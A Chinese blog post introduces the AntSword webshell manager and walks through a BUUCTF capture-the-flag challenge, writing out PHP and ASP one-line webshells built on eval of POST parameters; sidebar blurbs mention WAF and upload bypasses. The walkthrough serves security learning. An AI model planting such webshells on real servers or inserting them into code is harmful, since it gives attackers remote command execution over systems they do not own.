中国蚁剑简介

已于 2023-03-28 20:34:10 修改
阅读量1.5k 收藏 3
点赞数
文章标签: php 服务器 开发语言
于 2023-03-28 20:31:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73721944/article/details/129822834
版权

1简单介绍

中国蚁剑和中国菜刀类似,是一款webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。

一般结合一句话木马和文件上传使用

一句话木马:在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此

最简单的一句话木马:

   <?php @eval($_POST['cmd']);?>

常见的一句话木马:

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%>

(1)php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。
(2)@符号的意思是不报错,即使执行错误,也不报错。

2.实操

eg1:buuctf[极客大挑战2019]Knife

进去后的界面

 eval($_POST["Syc"]);

知道的信息有密码:Syc

复制网址到蚁剑添加数据测试连接,连接成功后添加就可以看到一些信息

使用虚拟终端,输入:ashelp

主要使用文件管理,该题找到flag即可

注:安装和使用过程中若出现问题有可能是自己电脑的安全软件将蚁剑作为病毒拦截了

也可用其他方式看flag,用蚁剑比较通俗易懂

@小左
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中国蚁剑-antSword
lin__ying的博客
12-28 1200
蚁剑是一款开源的跨平台Webshell管理工具,它是一个开源的远程管理工具,主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。蚁剑提供了一个图形化界面,可以通过简单的操作连接和控制目标设备或系统。蚁剑具有以下特点:1.支持多种操作系统:蚁剑支持多种操作系统,包括Windows、Linux、MacOS等,因此具有很好的跨平台性能。2.功能丰富:蚁剑具有文件管理器、进程管理器、主机信息查看器、端口转发等多种功能,为用户提供了全面的远程管理服务。
中国蚁剑:webshell管理工具
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
04-28 565
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,比菜刀功能更加丰富的webshell管理工具
中国蚁剑的下载与安装
weixin_42515203的博客
05-20 590
网络安全工具之中国蚁剑的下载与安装及简单使用。
攻防兼备:中国蚁剑使用指南及特征流量
ZL_1618的博客
03-06 3045
蚁剑这款工具在流量加密上特征比较明显,而且返回包多是明文,很容易在流量上就被查杀。!!接下来我将给各位同学划分一张学习计划表!
中国蚁剑 安装教程 2024年5月
最新发布
YueXuan_521的博客
06-10 637
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 win32-x64”的加载器文件夹,然后启动该文件夹内的AntSword.exe应用程序。前往“Windows防护中心”–>“保护历史记录”,选择“操作”中的“还原”,就可以解决问题。三、假如依照指示,用户选定一个空白目录来进行初始化操作,系统将自动执行源代码的下载任务。不过,我们已经将源代码下载好了,选择源代码的文件夹路径。下载中国蚁剑的核心源码时,可能因为检测到病毒无法下载,或文件被防火墙删除。
中国蚁剑安装使用教程
Karka_的博客
03-21 1920
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF。
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 529
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
中国蚁剑AntSword
04-07
中国蚁剑,又称AntSword,是一款开源的网络渗透测试工具,主要应用于CTF(Capture The Flag)竞赛和网络安全领域的安全测试与分析。这款工具以其简单易用、功能丰富的特性深受安全研究人员和爱好者喜爱。在本文中,...
中国蚁剑下载安装包 保证正版
12-23
这是我上传的中国蚁剑下载安装包,它是一款功能强大的网络安全工具,可以帮助您检测和防御各种网络威胁。中国蚁剑具有以下特点: 1.全面检测:中国蚁剑可以对您的网络环境进行全面检测,及时发现潜在的安全风险和...
中国蚁剑antSword
04-27
正版中国蚁剑,黑客控制网站必备工具,解压后配置文件就可以用了
中国蚁剑源码antsword.zip
08-07
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。
AS_ASPX_AES_ENCODE:蚁剑AES加密通信ASPX Webshell
07-24
AS_ASPX_AES_ENCODE 蚁剑AES加密通信ASPX Webshell 原理:
中国蚁剑使用教程.zip
12-12
中国蚁剑使用教程.zip 中国蚁剑采用了Electron作为外壳,ES6作为前端代码编写语言 利用js调用shell执行XSS代码
中国蚁剑源码antSword-2.1.9.zip
09-17
中国蚁剑(AntSword)是一款开源的安全工具,主要用于网络安全测试和Web应用的渗透测试。在本案例中,我们讨论的是其2.1.9版本的源码。这个压缩包"antSword-2.1.9.zip"包含了蚁剑项目在该版本的所有源代码,用户可以...
中国蚁剑2.1.9_内含源码和加载器.rar
11-19
中国蚁剑是一款开源的Web渗透测试工具,以其高效、便捷的操作方式受到许多网络安全专业人士的青睐。版本2.1.9是该工具的一个迭代更新,它提供了更多的功能和优化,以帮助用户更好地进行网站的安全测试。加载器v4.0.3...
蚁剑连接一句话木马
m0_64417923的博客
05-18 8171
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
中国蚁剑安装教程——antsword及webshell一句话木马
qq_53099802的博客
04-22 7324
antsword与php一话木马
文件上传漏洞工具中国蚁剑的安装配置以及使用
qq_38865635的博客
05-29 4127
文件上传漏洞工具中国蚁剑的安装配置和使用
kali linux安装中国蚁剑
03-16
抱歉,我是AI语言模型,无法在本地安装软件。但是,您可以在Kali Linux上安装中国蚁剑,具体步骤如下: 1. 下载中国蚁剑的Linux版本,可以从官方网站或者Github上下载。 2. 解压下载的文件,可以使用命令tar -zxvf antSword_linux_x64.tar.gz进行解压。 3. 进入解压后的文件夹,可以使用cd antSword_linux_x64命令进入。 4. 执行./antSword命令启动中国蚁剑。 5. 如果启动失败,可以使用命令chmod +x antSword对文件进行授权。 6. 启动成功后,可以在浏览器中输入http://127...1:808/访问中国蚁剑。 希望这些步骤对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值